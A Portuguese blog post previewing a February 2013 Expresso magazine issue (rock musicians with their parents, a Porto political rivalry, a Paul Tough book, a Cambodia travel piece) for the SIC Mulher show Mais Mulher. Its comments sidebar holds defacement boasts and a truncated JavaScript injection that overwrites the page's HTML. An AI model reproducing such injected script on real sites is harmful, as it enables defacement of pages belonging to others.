Zoom Expresso @ 18:31

Qua, 13/02/13

Esta a semana a capa traz-nos os pais do rock, o Expresso juntou vários roqueiros nacionais com os respetivos pais, que contam como viveram as opções dos filhos pela música.


De onde vieram as nossas estrelas rock e pop? Que histórias têm para contar os pais e as mães destes roqueiros sobre a infância dos filhos e como foram parar à música? Com baterias e guitarras elétricas pelo meio, uns e outros revelam segredos, braços de ferro e cumplicidades.
OS ROCKERS INTERNAIONAIS: No dia 24 de setembro de 1971 a revista “Life” mostrou um lado mais íntimo na vida de estrelas da música pop e rock, fotografadas pela primeira vez junto dos pais, nas casas onde nasceram. O contraste foi retratado por John Olson, que soube captar o amor e o afeto que nenhuma diferença geracional pode apagar. E o resto é rock’n’roll!

O PERIGO MORA AO LADO:  Rui Rio e Luís Filipe Menezes protagonizam um cisma nortenho. São do mesmo partido, mas evitam-se. Residem na mesma cidade, mas não se cruzam. São da mesma geração, mas têm interesses antagónicos. Vivem um clima de guerra não declarada, agora agudizado com a intenção de um tomar conta da Câmara que o outro abandona.

INIMIGOS DE ESTIMAÇÃO:  As maquinações, as divergências, os ódios e os ressentimentos gerados pela prática política provocam um corrupio de longas
amizades desfeitas. Algumas recompõe-se com o tempo, outras ficam para sempre bloqueadas no seu próprio labirinto

O QUE É PRECISO PARA VENCER NA VIDA
(Livro “educar para o futuro: persistência, curiosidade e o poder oculto do carácter”, de Paul Tough)
A inteligência não basta para que uma criança venha a ser bem sucedida. Uma nova corrente, que vai da psicologia à economia, passando pelas neurociências, explica que os traços de carácter, como a persistência, a curiosidade, o otimismo e o autocontrolo, são mais importantes do que o QI.
(Paul Tough é jornalista nas áreas da educação e da política. “Educar para o futuro: persistência, curiosidade e o poder oculto do carácter” (clube do autor) é o seu segundo livro)

SAÍDA DE EMERGÊNCIA:  Camboja POR RITA FERRO
Avencedora do Prémio Pen 2012 assina o sexto texto da série de viagens do Expresso. Na última escapada que fez, ao Camboja, a romancista trouxe uma alma na bagagem

 

Histórias a não perder no Mais Mulher desta quinta-feira, às 17:30 na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 


Tags:

Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
blogs SAPO